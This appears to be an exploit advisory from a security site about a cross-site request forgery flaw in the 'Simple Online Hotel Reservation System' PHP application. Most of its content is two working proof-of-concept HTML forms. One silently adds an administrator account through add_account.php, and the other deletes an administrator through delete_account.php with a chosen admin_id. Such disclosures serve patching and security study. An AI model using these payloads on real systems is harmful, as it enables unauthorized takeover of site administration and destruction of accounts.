Simple Online Hotel Reservation System Cross Site Request Forgery

2019.02.28
Credit: Mr Winst0n
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Add Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/add_account.php"> <label>Name </label> <input type = "text" name = "name" /><br><br> <label>Username </label> <input type = "text" name = "username" /><br><br> <label>Password </label> <input type = "password" name = "password" /><br><br> <button name = "add_account">Saved</button> </div> </form> </body> </html> # Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Delete Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1"> <!-- You can change admin_id --> <button>Delete</button> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top